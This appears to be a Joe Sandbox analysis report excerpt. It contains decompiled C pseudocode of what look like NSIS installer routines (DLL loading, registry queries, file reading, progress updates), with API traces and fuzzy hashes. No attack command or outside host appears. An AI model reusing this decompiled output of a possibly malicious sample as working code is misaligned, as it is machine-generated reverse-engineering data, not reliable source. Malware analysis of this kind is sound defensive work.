                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FilePointer$CountTick
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 1092082344-0
                                                                                                                                                                                                                            • Opcode ID: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                                                                                                                                                                                                            • Instruction ID: 4a0f782daef8a724a5dada35133bb9654e3c612a62d69fcdf17392b9264be50a
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3ac154d52ea9800dffc85ef1316eb03f3be91f57b238af8bcd161a90f23d8065
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3A31AEB2650205EFC7209F29EE848263BADF70475A755023BE900B22F1C7B59D42DB9D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 60%
                                                                                                                                                                                                                            			E004020D8(void* __ebx, void* __eflags) {
                                                                                                                                                                                                                            				struct HINSTANCE__* _t23;
                                                                                                                                                                                                                            				struct HINSTANCE__* _t31;
                                                                                                                                                                                                                            				void* _t32;
                                                                                                                                                                                                                            				WCHAR* _t35;
                                                                                                                                                                                                                            				intOrPtr* _t36;
                                                                                                                                                                                                                            				void* _t37;
                                                                                                                                                                                                                            				void* _t39;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t32 = __ebx;
                                                                                                                                                                                                                            				asm("sbb eax, 0x42a320");
                                                                                                                                                                                                                            				 *(_t39 - 4) = 1;
                                                                                                                                                                                                                            				if(__eflags < 0) {
                                                                                                                                                                                                                            					_push(0xffffffe7);
                                                                                                                                                                                                                            					L15:
                                                                                                                                                                                                                            					E00401423();
                                                                                                                                                                                                                            					L16:
                                                                                                                                                                                                                            					 *0x42a2e8 =  *0x42a2e8 +  *(_t39 - 4);
                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t35 = E00402DA6(0xfffffff0);
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t39 - 0x44)) = E00402DA6(1);
                                                                                                                                                                                                                            				if( *((intOrPtr*)(_t39 - 0x20)) == __ebx) {
                                                                                                                                                                                                                            					L3:
                                                                                                                                                                                                                            					_t23 = LoadLibraryExW(_t35, _t32, 8); // executed
                                                                                                                                                                                                                            					_t47 = _t23 - _t32;
                                                                                                                                                                                                                            					 *(_t39 + 8) = _t23;
                                                                                                                                                                                                                            					if(_t23 == _t32) {
                                                                                                                                                                                                                            						_push(0xfffffff6);
                                                                                                                                                                                                                            						goto L15;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					L4:
                                                                                                                                                                                                                            					_t36 = E00406AA4(_t47,  *(_t39 + 8),  *((intOrPtr*)(_t39 - 0x44)));
                                                                                                                                                                                                                            					if(_t36 == _t32) {
                                                                                                                                                                                                                            						E004056CA(0xfffffff7,  *((intOrPtr*)(_t39 - 0x44)));
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						 *(_t39 - 4) = _t32;
                                                                                                                                                                                                                            						if( *((intOrPtr*)(_t39 - 0x28)) == _t32) {
                                                                                                                                                                                                                            							 *_t36( *((intOrPtr*)(_t39 - 8)), 0x400, _t37, 0x40ce58, 0x40a000); // executed
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							E00401423( *((intOrPtr*)(_t39 - 0x28)));
                                                                                                                                                                                                                            							if( *_t36() != 0) {
                                                                                                                                                                                                                            								 *(_t39 - 4) = 1;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t39 - 0x24)) == _t32 && E00403CB7( *(_t39 + 8)) != 0) {
                                                                                                                                                                                                                            						FreeLibrary( *(_t39 + 8)); // executed
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					goto L16;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t31 = GetModuleHandleW(_t35); // executed
                                                                                                                                                                                                                            				 *(_t39 + 8) = _t31;
                                                                                                                                                                                                                            				if(_t31 != __ebx) {
                                                                                                                                                                                                                            					goto L4;
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				goto L3;
                                                                                                                                                                                                                            			}










                                                                                                                                                                                                                            0x00402146
                                                                                                                                                                                                                            0x00402138
                                                                                                                                                                                                                            0x00402178
                                                                                                                                                                                                                            0x00402191
                                                                                                                                                                                                                            0x00402191
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402178
                                                                                                                                                                                                                            0x00402103
                                                                                                                                                                                                                            0x0040210b
                                                                                                                                                                                                                            0x0040210e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • GetModuleHandleW.KERNELBASE(00000000,00000001,000000F0), ref: 00402103
                                                                                                                                                                                                                              • Part of subcall function 004056CA: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000,?), ref: 00405702
                                                                                                                                                                                                                              • Part of subcall function 004056CA: lstrlenW.KERNEL32(004030A8,Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,004030A8,00000000), ref: 00405712
                                                                                                                                                                                                                              • Part of subcall function 004056CA: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll,004030A8), ref: 00405725
                                                                                                                                                                                                                              • Part of subcall function 004056CA: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp\System.dll), ref: 00405737
                                                                                                                                                                                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040575D
                                                                                                                                                                                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405777
                                                                                                                                                                                                                              • Part of subcall function 004056CA: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405785
                                                                                                                                                                                                                            • LoadLibraryExW.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00402114
                                                                                                                                                                                                                            • FreeLibrary.KERNELBASE(?,?,000000F7,?,?,00000008,00000001,000000F0), ref: 00402191
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 334405425-0
                                                                                                                                                                                                                            • Opcode ID: 49624561057d65463e648c025d3924b1173f5861ada87d1c47d5b8f7605275f5
                                                                                                                                                                                                                            • Instruction ID: 1e7e134340f86907485d462c64894228b35b3344cd4f3d252167f9901203d809
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 49624561057d65463e648c025d3924b1173f5861ada87d1c47d5b8f7605275f5
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C521C231904104FADF11AFA5CF48A9D7A70BF48354F60413BF605B91E0DBBD8A929A5D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 86%
                                                                                                                                                                                                                            			E0040259E(int* __ebx, intOrPtr __edx, short* __edi) {
                                                                                                                                                                                                                            				void* _t9;
                                                                                                                                                                                                                            				int _t10;
                                                                                                                                                                                                                            				long _t13;
                                                                                                                                                                                                                            				int* _t16;
                                                                                                                                                                                                                            				intOrPtr _t21;
                                                                                                                                                                                                                            				short* _t22;
                                                                                                                                                                                                                            				void* _t24;
                                                                                                                                                                                                                            				void* _t26;
                                                                                                                                                                                                                            				void* _t29;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t22 = __edi;
                                                                                                                                                                                                                            				_t21 = __edx;
                                                                                                                                                                                                                            				_t16 = __ebx;
                                                                                                                                                                                                                            				_t9 = E00402DE6(_t29, 0x20019); // executed
                                                                                                                                                                                                                            				_t24 = _t9;
                                                                                                                                                                                                                            				_t10 = E00402D84(3);
                                                                                                                                                                                                                            				 *((intOrPtr*)(_t26 - 0x10)) = _t21;
                                                                                                                                                                                                                            				 *__edi = __ebx;
                                                                                                                                                                                                                            				if(_t24 == __ebx) {
                                                                                                                                                                                                                            					 *((intOrPtr*)(_t26 - 4)) = 1;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					 *(_t26 + 8) = 0x3ff;
                                                                                                                                                                                                                            					if( *((intOrPtr*)(_t26 - 0x20)) == __ebx) {
                                                                                                                                                                                                                            						_t13 = RegEnumValueW(_t24, _t10, __edi, _t26 + 8, __ebx, __ebx, __ebx, __ebx);
                                                                                                                                                                                                                            						__eflags = _t13;
                                                                                                                                                                                                                            						if(_t13 != 0) {
                                                                                                                                                                                                                            							 *((intOrPtr*)(_t26 - 4)) = 1;
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						RegEnumKeyW(_t24, _t10, __edi, 0x3ff); // executed
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t22[0x3ff] = _t16;
                                                                                                                                                                                                                            					_push(_t24); // executed
                                                                                                                                                                                                                            					RegCloseKey(); // executed
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t26 - 4));
                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                            			}













                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D1
                                                                                                                                                                                                                            • RegEnumValueW.ADVAPI32 ref: 004025E4
                                                                                                                                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: Enum$CloseValue
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 397863658-0
                                                                                                                                                                                                                            • Opcode ID: a2874957321bf6034ab335a01143add9f6f6121a8284cc98450072ad0413cc1f
                                                                                                                                                                                                                            • Instruction ID: fdd171a53236be04b49e80cc8c25aaf428e2db1c32e81cf7e645575326a8d696
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a2874957321bf6034ab335a01143add9f6f6121a8284cc98450072ad0413cc1f
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 35017CB1A04105ABEB159F94DE58AAEB66CEF40348F10403AF501B61D0EBB85E45966D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                                                                                            			E00403371(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16) {
                                                                                                                                                                                                                            				long _v8;
                                                                                                                                                                                                                            				long _t21;
                                                                                                                                                                                                                            				long _t22;
                                                                                                                                                                                                                            				void* _t24;
                                                                                                                                                                                                                            				long _t26;
                                                                                                                                                                                                                            				int _t27;
                                                                                                                                                                                                                            				long _t28;
                                                                                                                                                                                                                            				void* _t30;
                                                                                                                                                                                                                            				long _t31;
                                                                                                                                                                                                                            				long _t32;
                                                                                                                                                                                                                            				long _t36;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t21 = _a4;
                                                                                                                                                                                                                            				if(_t21 >= 0) {
                                                                                                                                                                                                                            					_t32 = _t21 +  *0x42a2b8;
                                                                                                                                                                                                                            					 *0x420ef4 = _t32;
                                                                                                                                                                                                                            					SetFilePointer( *0x40a01c, _t32, 0, 0); // executed
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				_t22 = E00403479(4);
                                                                                                                                                                                                                            				if(_t22 >= 0) {
                                                                                                                                                                                                                            					_t24 = E004061DB( *0x40a01c,  &_a4, 4); // executed
                                                                                                                                                                                                                            					if(_t24 == 0) {
                                                                                                                                                                                                                            						L18:
                                                                                                                                                                                                                            						_push(0xfffffffd);
                                                                                                                                                                                                                            						goto L19;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						 *0x420ef4 =  *0x420ef4 + 4;
                                                                                                                                                                                                                            						_t36 = E00403479(_a4);
                                                                                                                                                                                                                            						if(_t36 < 0) {
                                                                                                                                                                                                                            							L21:
                                                                                                                                                                                                                            							_t22 = _t36;
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							if(_a12 != 0) {
                                                                                                                                                                                                                            								_t26 = _a4;
                                                                                                                                                                                                                            								if(_t26 >= _a16) {
                                                                                                                                                                                                                            									_t26 = _a16;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            								_t27 = ReadFile( *0x40a01c, _a12, _t26,  &_v8, 0); // executed
                                                                                                                                                                                                                            								if(_t27 != 0) {
                                                                                                                                                                                                                            									_t36 = _v8;
                                                                                                                                                                                                                            									 *0x420ef4 =  *0x420ef4 + _t36;
                                                                                                                                                                                                                            									goto L21;
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									goto L18;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								if(_a4 <= 0) {
                                                                                                                                                                                                                            									goto L21;
                                                                                                                                                                                                                            								} else {
                                                                                                                                                                                                                            									while(1) {
                                                                                                                                                                                                                            										_t28 = _a4;
                                                                                                                                                                                                                            										if(_a4 >= 0x4000) {
                                                                                                                                                                                                                            											_t28 = 0x4000;
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            										_v8 = _t28;
                                                                                                                                                                                                                            										if(E004061DB( *0x40a01c, 0x414ef0, _t28) == 0) {
                                                                                                                                                                                                                            											goto L18;
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            										_t30 = E0040620A(_a8, 0x414ef0, _v8); // executed
                                                                                                                                                                                                                            										if(_t30 == 0) {
                                                                                                                                                                                                                            											_push(0xfffffffe);
                                                                                                                                                                                                                            											L19:
                                                                                                                                                                                                                            											_pop(_t22);
                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                            											_t31 = _v8;
                                                                                                                                                                                                                            											_a4 = _a4 - _t31;
                                                                                                                                                                                                                            											 *0x420ef4 =  *0x420ef4 + _t31;
                                                                                                                                                                                                                            											_t36 = _t36 + _t31;
                                                                                                                                                                                                                            											if(_a4 > 0) {
                                                                                                                                                                                                                            												continue;
                                                                                                                                                                                                                            											} else {
                                                                                                                                                                                                                            												goto L21;
                                                                                                                                                                                                                            											}
                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                            										goto L22;
                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                            									goto L18;
                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				L22:
                                                                                                                                                                                                                            				return _t22;
                                                                                                                                                                                                                            			}














                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004033e2
                                                                                                                                                                                                                            0x004033e5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004033eb
                                                                                                                                                                                                                            0x004033f0
                                                                                                                                                                                                                            0x004033f7
                                                                                                                                                                                                                            0x004033fa
                                                                                                                                                                                                                            0x004033fc
                                                                                                                                                                                                                            0x004033fc
                                                                                                                                                                                                                            0x00403409
                                                                                                                                                                                                                            0x00403413
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040341c
                                                                                                                                                                                                                            0x00403423
                                                                                                                                                                                                                            0x0040343b
                                                                                                                                                                                                                            0x00403465
                                                                                                                                                                                                                            0x00403465
                                                                                                                                                                                                                            0x00403425
                                                                                                                                                                                                                            0x00403425
                                                                                                                                                                                                                            0x00403428
                                                                                                                                                                                                                            0x0040342b
                                                                                                                                                                                                                            0x00403431
                                                                                                                                                                                                                            0x00403437
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403439
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403439
                                                                                                                                                                                                                            0x00403437
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00403423
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004033f0
                                                                                                                                                                                                                            0x004033e5
                                                                                                                                                                                                                            0x004033e0
                                                                                                                                                                                                                            0x004033d7
                                                                                                                                                                                                                            0x004033be
                                                                                                                                                                                                                            0x00403473
                                                                                                                                                                                                                            0x00403476

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • SetFilePointer.KERNELBASE(?,00000000,00000000,00000000,00000000,?,?,0040331D,000000FF,00000000,00000000,?,?), ref: 00403396
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: FilePointer
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 973152223-0
                                                                                                                                                                                                                            • Opcode ID: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                                                                                                                                                                                                            • Instruction ID: 963a71f16df831595788c30304fa9cedbf2cad19eb63879c1ada4fe15c9ed8fa
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b1bf35b654f0c361909532a2badc84153f12731a676864620281ad9f652e4f28
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 93319F70200219EFDB129F65ED84E9A3FA8FF00355B10443AF905EA1A1D778CE51DBA9
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 84%
                                                                                                                                                                                                                            			E0040252A(int* __ebx, char* __edi) {
                                                                                                                                                                                                                            				void* _t17;
                                                                                                                                                                                                                            				short* _t18;
                                                                                                                                                                                                                            				void* _t35;
                                                                                                                                                                                                                            				void* _t37;
                                                                                                                                                                                                                            				void* _t40;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t33 = __edi;
                                                                                                                                                                                                                            				_t27 = __ebx;
                                                                                                                                                                                                                            				_t17 = E00402DE6(_t40, 0x20019); // executed
                                                                                                                                                                                                                            				_t35 = _t17;
                                                                                                                                                                                                                            				_t18 = E00402DA6(0x33);
                                                                                                                                                                                                                            				 *__edi = __ebx;
                                                                                                                                                                                                                            				if(_t35 == __ebx) {
                                                                                                                                                                                                                            					 *(_t37 - 4) = 1;
                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                            					 *(_t37 - 0x10) = 0x800;
                                                                                                                                                                                                                            					if(RegQueryValueExW(_t35, _t18, __ebx, _t37 + 8, __edi, _t37 - 0x10) != 0) {
                                                                                                                                                                                                                            						L7:
                                                                                                                                                                                                                            						 *_t33 = _t27;
                                                                                                                                                                                                                            						 *(_t37 - 4) = 1;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						if( *(_t37 + 8) == 4) {
                                                                                                                                                                                                                            							__eflags =  *(_t37 - 0x20) - __ebx;
                                                                                                                                                                                                                            							 *(_t37 - 4) = 0 |  *(_t37 - 0x20) == __ebx;
                                                                                                                                                                                                                            							E004065AF(__edi,  *__edi);
                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                            							if( *(_t37 + 8) == 1 ||  *(_t37 + 8) == 2) {
                                                                                                                                                                                                                            								 *(_t37 - 4) =  *(_t37 - 0x20);
                                                                                                                                                                                                                            								_t33[0x7fe] = _t27;
                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                            								goto L7;
                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_push(_t35); // executed
                                                                                                                                                                                                                            					RegCloseKey(); // executed
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				 *0x42a2e8 =  *0x42a2e8 +  *(_t37 - 4);
                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                            			}








                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00402571
                                                                                                                                                                                                                            0x0040256c
                                                                                                                                                                                                                            0x004025fc
                                                                                                                                                                                                                            0x004025fd
                                                                                                                                                                                                                            0x004025fd
                                                                                                                                                                                                                            0x00402c2d
                                                                                                                                                                                                                            0x00402c39

                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 0040255B
                                                                                                                                                                                                                            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\AppData\Local\Temp\nsbCCFB.tmp,00000000,00000011,00000002), ref: 004025FD
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID: CloseQueryValue
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID: 3356406503-0
                                                                                                                                                                                                                            • Opcode ID: 2f519eafec3af35988992028302c1fe2ffbfb85c9afca13b7af9384ace0fec36
                                                                                                                                                                                                                            • Instruction ID: eaee0c709954dca67eb2d1c59e66f6ca2c08a593dad46a4828cc6951ae7b5872
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2f519eafec3af35988992028302c1fe2ffbfb85c9afca13b7af9384ace0fec36
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5C116D71900219EBDF14DFA4DE589AE7774FF04345B20443BE401B62D0E7B88A45EB5D
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            C-Code - Quality: 69%
                                                                                                                                                                                                                            			E00401389(signed int _a4, struct HWND__* _a10) {
                                                                                                                                                                                                                            				intOrPtr* _t6;
                                                                                                                                                                                                                            				void* _t8;
                                                                                                                                                                                                                            				void* _t10;
                                                                                                                                                                                                                            				signed int _t11;
                                                                                                                                                                                                                            				void* _t12;
                                                                                                                                                                                                                            				signed int _t16;
                                                                                                                                                                                                                            				signed int _t17;
                                                                                                                                                                                                                            
                                                                                                                                                                                                                            				_t17 = _a4;
                                                                                                                                                                                                                            				while(_t17 >= 0) {
                                                                                                                                                                                                                            					_t6 = _t17 * 0x1c +  *0x42a290;
                                                                                                                                                                                                                            					if( *_t6 == 1) {
                                                                                                                                                                                                                            						break;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_push(_t6); // executed
                                                                                                                                                                                                                            					_t8 = E00401434(); // executed
                                                                                                                                                                                                                            					if(_t8 == 0x7fffffff) {
                                                                                                                                                                                                                            						return 0x7fffffff;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					_t10 = E0040136D(_t8);
                                                                                                                                                                                                                            					if(_t10 != 0) {
                                                                                                                                                                                                                            						_t11 = _t10 - 1;
                                                                                                                                                                                                                            						_t16 = _t17;
                                                                                                                                                                                                                            						_t17 = _t11;
                                                                                                                                                                                                                            						_t12 = _t11 - _t16;
                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                            						_t12 = _t10 + 1;
                                                                                                                                                                                                                            						_t17 = _t17 + 1;
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            					if(_a10 != 0) {
                                                                                                                                                                                                                            						 *0x42924c =  *0x42924c + _t12;
                                                                                                                                                                                                                            						SendMessageW(_a10, 0x402, MulDiv( *0x42924c, 0x7530,  *0x429234), 0); // executed
                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                            				return 0;
                                                                                                                                                                                                                            			}











                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000402,00000000), ref: 004013F4
                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmp
